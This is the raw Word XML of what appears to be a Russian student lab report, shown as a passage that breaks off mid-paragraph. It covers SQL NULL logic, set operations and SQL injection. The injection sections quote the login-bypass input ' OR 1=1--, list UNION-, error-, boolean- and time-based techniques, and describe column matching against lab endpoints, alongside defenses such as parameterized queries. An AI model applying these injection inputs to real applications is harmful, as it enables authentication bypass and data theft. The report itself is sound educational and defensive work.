          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAA76C7" w14:textId="0AD3188A" w:rsidR="000C2407" w:rsidRPr="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00730657">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc229005037"/>
      <w:r>
        <w:t>NULL и трехзначная логика SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="761B6C7D" w14:textId="5BBC3C48" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В SQL значение NULL означает отсутствие определенного значения, а не пустую строку и не ноль. Из-за этого обычные сравнения с NULL не работают так же, как сравнения с конкретными значениями. Например, выражение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL не возвращает TRUE; для проверки отсутствующего значения требуется использовать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901BBBF" w14:textId="125B82F9" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Это важно для рассматриваемой предметной области, потому что в таблице документов отсутствие степени секретности может означать несекретный документ. Следовательно, при составлении запросов необходимо явно учитывать NULL, иначе часть документов может быть неправильно отфильтрована. Например, запросы по секретным документам должны использовать условие </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'секретно', а запросы по несекретным документам — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA7115" w14:textId="628B3ACC" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Трехзначная логика SQL включает значения TRUE, FALSE и UNKNOWN. Если в условии WHERE результатом выражения становится UNKNOWN, строка не попадает в результат. Это особенно важно при использовании отрицаний и условий NOT IN. Если в наборе значений присутствует NULL, поведение NOT IN может оказаться неожиданным: сравнение может дать UNKNOWN, и строка будет отброшена. Поэтому в практических запросах часто безопаснее использовать NOT EXISTS или заранее исключать NULL-значения из проверяемого набора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D57F74" w14:textId="5F618E57" w:rsidR="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В лабораторной работе это связано с запросом по срокам окончания действия документов. Поле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>effective_until</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> теоретически может быть неопределенным, поэтому при фильтрации по месяцу необходимо учитывать только те строки, где дата окончания действия задана. Если не обработать NULL, результат может стать логически неполным или неоднозначным</w:t>
      </w:r>
      <w:r w:rsidR="00572DB0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289B679" w14:textId="77777777" w:rsidR="00572DB0" w:rsidRPr="000C2407" w:rsidRDefault="00572DB0" w:rsidP="00572DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D582E6" w14:textId="5C4C9CAC" w:rsidR="000C2407" w:rsidRPr="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00730657">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc229005038"/>
      <w:r>
        <w:t>Множественные операции и сложные запросы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0B9AEFFE" w14:textId="2AFDAD0E" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL поддерживает операции над множествами: UNION, INTERSECT и EXCEPT. Они позволяют объединять результаты нескольких запросов, находить общие строки или вычитать один результат из другого. Для корректной работы этих операций необходимо, чтобы объединяемые запросы возвращали одинаковое количество столбцов, а типы столбцов были совместимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543525FA" w14:textId="7EAAAD39" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В первой части лабораторной работы множественная логика проявляется при поиске сотрудников, выполнивших все операции из заданного перечня. Для такого условия недостаточно проверить наличие одной операции. Нужно сравнить множество операций, фактически выполненных сотрудником по документу, с множеством обязательных операций. Это может быть реализовано через </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DISTINCT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>operation_description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>) и сравнение с количеством операций в заданном перечне либо через вложенные запросы с NOT EXISTS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D71365" w14:textId="1BCC10BC" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Во второй части эта же особенность SQL используется уже с позиции анализа уязвимостей. При UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-инъекции атакующий добавляет к исходному запросу собственный UNION SELECT. Чтобы такой запрос выполнился, необходимо подобрать количество колонок и их типы. На стенде это было продемонстрировано дважды: сначала для /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, где удалось подобрать три текстовые колонки, затем для /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>products?category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>=..., где потребовалось подобрать порядок и типы семи колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC3038" w14:textId="1F125249" w:rsidR="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Таким образом, множественные операции SQL важны не только как средство построения легитимных запросов, но и как механизм, который может быть использован при эксплуатации уязвимости. Если приложение формирует SQL-запрос через конкатенацию строк, злоумышленник может встроить в него собственную множественную операцию и получить данные, которые исходная логика приложения не должна была возвращать</w:t>
      </w:r>
      <w:r w:rsidR="000C2407" w:rsidRPr="000C2407">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB7F62" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419299A7" w14:textId="2B2D0460" w:rsidR="00FB440B" w:rsidRPr="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc229005039"/>
      <w:r>
        <w:t>SQL-инъекции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="403EFD02" w14:textId="77BF5D81" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL-инъекция возникает в том случае, когда приложение включает пользовательский ввод в текст SQL-запроса как часть кода, а не как значение параметра. В результате граница между данными и инструкциями нарушается. Пользовательский ввод начинает интерпретироваться СУБД как SQL-выражение, что может привести к обходу авторизации, чтению чужих данных, изменению записей или получению структуры базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB81E1" w14:textId="6AA2846E" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Классический пример — форма входа, где </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> формирует запрос вида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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;'. Если значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставляются напрямую, то ввод вроде ' OR 1=1-- меняет логику условия. Комментарий -- отсекает оставшуюся часть исходного запроса, а условие OR 1=1 делает предикат истинным. В результате приложение может считать пользователя успешно авторизованным без знания корректного пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B32B4B" w14:textId="5B29B8C7" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-инъекции различаются по каналу получения результата. При </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>error-based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приложение возвращает ошибку СУБД, из которой можно узнать структуру запроса, типы колонок или используемую СУБД. При </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>boolean-based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результат определяется по различию поведения для истинного и ложного условия. При UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>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результат дополнительного запроса внедряется в обычный ответ приложения. При </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>time-based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используются задержки выполнения, например через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, если приложение не возвращает явных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FF43D" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E930825" w14:textId="43B1B1AB" w:rsidR="00FB440B" w:rsidRPr="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc229005040"/>
      <w:r>
        <w:t>Защита от SQL-инъекций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="26B39363" w14:textId="46FA3474" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Основной способ защиты от SQL-инъекций — параметризованные запросы. При таком подходе SQL-код и значения пользовательских параметров передаются в СУБД отдельно. Даже если пользователь введет строку с кавычками, комментариями или SQL-операторами, она будет обработана как значение, а не как часть SQL-кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31134D08" w14:textId="07BB13B2" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Например, небезопасный вариант строит запрос через f-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> или конкатенацию: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">}'. Безопасный вариант использует </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>placeholder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: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%s, а значение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> передается отдельным параметром в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cursor.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. В этом случае драйвер экранирует и передает значение корректно, не позволяя изменить структуру запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40ADC5" w14:textId="2EEF4711" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная защита должна включать минимизацию прав пользователя БД. Даже если </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> возникла, учетная запись </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-приложения не должна иметь прав на изменение схемы, чтение системных таблиц сверх необходимого, доступ к служебной информации и выполнение опасных функций. В лабораторном стенде пользователь БД имел достаточно прав для чтения пользовательских таблиц и системного каталога </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, что позволило получить список таблиц и колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D0ABCB" w14:textId="2C8621E1" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Также необходимо отключать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-режим в продуктивной среде. На стенде </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Werkzeug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрывал </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>traceback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, строки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-кода и место формирования SQL-запроса. Для учебной лабораторной работы это полезно, но в реальной системе такие ошибки существенно ускоряют эксплуатацию, так как злоумышленник видит внутреннюю структуру приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC54C6" w14:textId="6E5B7DE9" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
